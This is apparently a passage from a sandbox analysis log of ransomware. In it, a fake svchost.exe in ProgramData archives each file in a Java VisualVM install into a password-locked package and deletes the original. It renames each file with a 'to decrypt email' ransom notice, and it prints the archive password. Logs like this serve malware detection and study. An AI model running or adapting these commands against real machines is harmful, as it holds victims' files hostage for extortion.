  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2664
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1352
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2476
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2244
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2804
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2644
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2312
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2236
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1016
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1792
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1520
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1160
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1636
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2272
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2232
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1952
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1408
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1784
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1468
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1252
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2836
- C:\ProgramData\msvkp\svchost.exe
